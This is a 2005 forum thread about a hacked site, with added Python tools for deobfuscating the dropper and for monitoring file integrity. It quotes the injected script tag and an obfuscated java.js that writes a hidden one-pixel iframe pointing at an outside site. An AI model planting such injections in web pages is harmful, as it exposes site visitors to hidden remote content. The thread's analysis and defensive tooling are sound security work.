Page 1 of 2

Someone's hacked my site! :-(

Posted: Thu Apr 07, 2005 7:33 am
by Chris Corbyn
Someone seems to have hacked into my half built website.... :?

I noticed header errors suddenly appearing and ActiveX warnings so I checked the code and noticed somebody had added

Code:

<script language=javascript src="/img/java.js"></script>
on the very top line - That's the reason for the header problem.

Going into my img directory I also find the Java.js file...

Code:

url = "http://www.fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';                              // ' display:none;}</style>'
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';   // '" FRAMEBORDER="0" WIDTH=1 HEIGHT=10%></IFRAME>'
uio = '<s'+'tyl'+'e type="text/css">';                                           // '<style type="text/css">'
asd = '<IF'+'RA'+'ME SRC="';                                                     // '<IFRAME SRC="'
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';                         // ' .text {visibility:hidden;'
a = asd+url+rty;   // a borderless 1-pixel-wide iframe that loads the remote page
b = uio+fgh+qwe;   // a stylesheet hiding anything with class "text"
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);   // keeps overwriting the status bar every 7 ms
Not sure anything else has been changed. Why would anybody want to hack into my half built site?

http://www.chriscorbyn.co.uk

I have no obvious way of people gaining access so I just don't get it. Could it be a virus? I'm hosted on pickaweb - a decent, reliable UK hosting company.
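
The concatenation in that java.js is there so that the words IFRAME and style never appear whole in the file; a grep of the site for "IFRAME" would miss it, while a grep for document.write or for an unexpected <script src= line at the top of every PHP file would not. What the script actually writes into the page is easier to see once the pieces are joined. The following is an added example, not code from the thread: a small Python evaluator for scripts of this shape (assignments built only from string literals, earlier variables and '+', followed by document.write calls) run over the posted java.js. SAMPLE_JS is constructed from the post with the forum's mangled &quote; entities restored to plain double quotes; self.focus() and setInterval() are treated as no-ops because they do not affect what is written.

```python
import re

# Constructed sample: the dropper java.js quoted in the post above, with the
# forum's mangled &quote; entities restored to plain double quotes.
SAMPLE_JS = r'''
url = "http://www.fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);
'''

# One token at a time: 'single' or "double" quoted literal, identifier, '+', whitespace.
TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|([A-Za-z_]\w*)|(\+)|\s+""")
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*;?\s*$")
WRITE = re.compile(r"^\s*document\.write\s*\(\s*(.*?)\s*\)\s*;?\s*$")


def eval_concat(expr, env):
    """Join a JS expression made only of string literals, known variables and '+'."""
    parts = []
    pos = 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported token near {expr[pos:pos + 10]!r}")
        pos = m.end()
        single, double, ident, _plus = m.groups()
        if single is not None or double is not None:
            parts.append(single if single is not None else double)
        elif ident:
            if ident not in env:
                raise ValueError(f"unknown identifier {ident}")
            parts.append(env[ident])
        # '+' and whitespace contribute nothing to the value
    return "".join(parts)


def deobfuscate(js_source):
    """Resolve every assignment in order and collect what document.write() would emit.
    Returns (variables, writes).  Lines that are neither are ignored."""
    env, writes = {}, []
    for line in js_source.splitlines():
        if not line.strip():
            continue
        m = WRITE.match(line)
        if m:
            writes.append(eval_concat(m.group(1), env))
            continue
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_concat(m.group(2), env)
    return env, writes


IFRAME_SRC = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def injected_urls(js_source):
    """The remote targets that hidden iframes written by this script point at."""
    _, writes = deobfuscate(js_source)
    return [u for w in writes for u in IFRAME_SRC.findall(w)]


if __name__ == "__main__":
    _, written = deobfuscate(SAMPLE_JS)
    for chunk in written:
        print(chunk)
    print("targets:", injected_urls(SAMPLE_JS))
```

Run as is, it prints the two fragments the browser receives: an IFRAME with FRAMEBORDER="0", WIDTH=1 and HEIGHT=10% pointing at the fotoprofit catalogue page, and a <style> block that sets .text to visibility:hidden and display:none. The URL list is the indicator worth keeping for the report to the host.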

Posted: Thu Apr 07, 2005 7:49 am
by CoderGoblin
Getting access to the site could be from a multitude of things, e.g. forum signature, email signatures and C.V. Is this also the site you had the old version on?

When it comes to hacking let's face it, many people don't care what the status of a site is. They often just want to hack. You can be grateful if no damage was done and you have the potential to fix the problem and ensure it doesn't happen again before your site goes live and contains lots of data which may be destroyed/exploited.

The code in question appears to automatically load a page (I would guess a pay per click site where someone is getting paid for directing others to it).

Posted: Thu Apr 07, 2005 7:54 am
by Chris Corbyn
This is all new - nothing from the old site on here.

It's very worrying how somebody has gained access to directly edit my PHP files and upload files to my images directory.

Even though I've fixed the problem, surely if someone's done it once it could keep happening?

What extra measures can I take to prevent this other than having an FTP password (which I am changing as we speak)??? If somebody can FTP to my site they have it all :(

I'm going to have valuable client information stored on a mysql database on here too and if somebody can access my files they can get my mysql UID and PW and do as they wish to it (I keep backups of course).

Posted: Thu Apr 07, 2005 8:29 am
by timvw
I can't understand why people use a broken protocol like ftp..
certainly not when they insist on using ssh instead of telnet...

scp/sftp is the way to go :)



might want to check access rights on your files on the webhost too... and check who logged into your account etc...

Posted: Fri Apr 08, 2005 6:59 am
by Chris Corbyn
timvw wrote:I can't understand why people use a broken protocol like ftp..
certainly not when they insist on using ssh instead of telnet...

scp/sftp is the way to go :)

might want to check access rights on your files on the webhost too... and check who logged into your account etc...
FTP is all I have access to. Not even sure I have SSH access.

I'll have to move host if I want to take advantage of ftps, scp etc...

Posted: Sat Apr 09, 2005 1:20 pm
by Ambush Commander
Well... Would CVS help track changes? If they really managed to get access via FTP in order to change your site, a CVS repository would allow you to see discrepancies and roll things back.

Posted: Sat Apr 09, 2005 1:51 pm
by Chris Corbyn
Ambush Commander wrote:Well... Would CVS help track changes? If they really managed to get access via FTP in order to change your site, a CVS repository would allow you to see discrepancies and roll things back.
Hey you know, that's a cool idea. I haven't used CVS before but you got me thinking on a sweet little project here to monitor my websites (based on the latest "official" version), and correct changes. Could be a bonus for clients too if they know I'll be constantly monitoring activity for them 8)

Posted: Sat Apr 09, 2005 4:58 pm
by timvw
actually, I think you are better off with a tool like tripwire


but if you need versioning, cvs can come in handy too.

Posted: Sat Apr 09, 2005 5:01 pm
by infolock
that sucks man. how did they gain access? You don't think they could have come in through my subdomain do you?

Posted: Sat Apr 09, 2005 5:09 pm
by Chris Corbyn
infolock wrote:that sucks man. how did they gain access? You don't think they could have come in through my subdomain do you?
Nah it was before that dude... sorted now anyway.

I did have mwftp sitting on there dormant (but it still requires a password, just possibly has a security flaw in it). I've deleted it anyway and I'm working on a code change monitor which will run a check by cron every 5 mins and fix any altered code, as well as alerting me asap of the details of the attack. I may post a snippet if it would be useful (got a couple of other things on the go so it may be a while).

I've changed my ftp password too.
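
timvw's tripwire suggestion and the cron job Chris describes (check every few minutes, put altered code back, raise an alert) are the same idea: a known-good manifest, a comparison, a revert. The following is an added example in Python, not Chris's monitor and not tripwire: snapshot() builds a manifest of SHA-256 and permission bits per file, compare() reports added, removed and modified paths, restore() copies the trusted version back over anything that changed and deletes anything that appeared, and world_readable() lists files any other account on a shared box could read, which is the access-rights check timvw mentioned. The site layout and the injection in run_demo() are constructed for the demo; the only real file names used are the index.php and img/java.js from the thread.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_file(path, chunk=65536):
    """Streamed SHA-256 of one file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Manifest of every regular file under root: relative path -> (sha256, mode).
    Symlinks and special files are skipped rather than followed."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (sha256_file(full), stat.S_IMODE(st.st_mode))
    return manifest


def compare(baseline, current):
    """Sorted lists of paths that were added, removed or changed (content or mode)."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def world_readable(manifest):
    """Paths whose mode grants read to 'other': readable by every account on a shared host."""
    return sorted(p for p, (_, mode) in manifest.items() if mode & stat.S_IROTH)


def restore(live_root, trusted_root, changes):
    """Revert the live tree to the trusted copy and return the paths touched.
    Modified and removed files are copied back; files not in the baseline are deleted."""
    touched = []
    for rel in changes["modified"] + changes["removed"]:
        dst = os.path.join(live_root, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(trusted_root, rel), dst)
        touched.append(rel)
    for rel in changes["added"]:
        os.remove(os.path.join(live_root, rel))
        touched.append(rel)
    return sorted(touched)


def run_demo():
    """Constructed scenario (not real site data): a tiny site and its trusted copy,
    then the injection the thread describes, a <script> line prepended to index.php
    and a dropper uploaded to img/.  Returns the change report before and after restore()."""
    with tempfile.TemporaryDirectory() as tmp:
        live = os.path.join(tmp, "live")
        trusted = os.path.join(tmp, "trusted")
        os.makedirs(os.path.join(live, "img"))
        with open(os.path.join(live, "index.php"), "w") as f:
            f.write("<?php echo 'half built'; ?>\n")
        shutil.copytree(live, trusted)          # the known-good copy, taken before the incident
        baseline = snapshot(trusted)

        with open(os.path.join(live, "index.php"), "r+") as f:
            original = f.read()
            f.seek(0)
            f.write('<script language=javascript src="/img/java.js"></script>\n' + original)
        with open(os.path.join(live, "img", "java.js"), "w") as f:
            f.write("document.write('<IFRAME SRC=...></IFRAME>');\n")

        before = compare(baseline, snapshot(live))
        restore(live, trusted, before)
        after = compare(baseline, snapshot(live))
        return before, after


if __name__ == "__main__":
    detected, remaining = run_demo()
    print("detected:", detected)        # index.php modified, img/java.js added
    print("after restore:", remaining)
```

Three caveats before running something like this from cron on a shared host. Keep the baseline, the trusted copy and the script itself outside the web root, and ideally off the box: whoever holds the FTP password can edit the monitor as easily as index.php. Exclude directories that are meant to change (uploads, caches, logs) before letting it delete "added" files. And copy the altered files somewhere safe before reverting them, because they are the evidence the host will want; reverting is a stop-gap, the way in still has to be found and closed. For world_readable(), concentrate on the files that hold secrets (.htpasswd, the database config) rather than the whole tree, since on many shared setups the web server runs as a different user and needs read access to the PHP files.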

Posted: Wed Apr 20, 2005 9:01 pm
by McGruff
Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.

Posted: Sat May 28, 2005 5:20 am
by ibolui
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldn't web hosting companies lose their shared hosting deals?

Posted: Sat May 28, 2005 6:13 am
by JAM
ibolui wrote:
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldn't web hosting companies lose their shared hosting deals?
I was just about to say what McGruff said earlier.

And no. It is solely up to the host admins themselves to secure the server farm/box. The users can make it more difficult of course (various security approaches already described above) but it all ends on the host's table.

If the host is not secure, nothing is.

I'd report the incident to the host and see if they know something about it. If the attack was directed at 100 randomly selected users, there might be several others that still do not know what has happened.
The admin might cover it up not to lose face and then you'll never know. The pros are that you actually might guide them into something they didn't know and possibly get a discount on the fees...

Posted: Sat May 28, 2005 9:19 am
by Buddha443556
ibolui wrote:
McGruff wrote:Another possibility is the host set up. If you're on a shared host it's often the case that anyone else on the same shared server can read any file on the other sites - including passwords in an .htpasswd file.
is there any way to prevent this??
if many people know about this, then wouldn't web hosting companies lose their shared hosting deals?
It helps to have a plan for such incidents. Could be as simple as ...

Making sure your own PC is secure - no Trojans stealing passwords. Updating your AV software. Check your hosts file. Check your Windows registry. Etc. Etc. Once you're sure your PC is secure, change all account passwords. Notify your host. Do not delete anything; the host will need to see it all. Put up an out-of-service page if necessary or until you can discover the extent of the damage. Now you can begin investigating the incident and repairing the damage in an orderly manner with your host.

Shared hosting is always risky .. but start by checking your own security first.

Having a plan keeps us from making things worse than they are already. :wink:

Posted: Sat May 28, 2005 9:45 am
by timvw
using ftp is as silly as telnetting ;)

at least use sftp, even better use scp (and start using public/private keys)..
might want to restrict access to the IP range that your ISP owns too..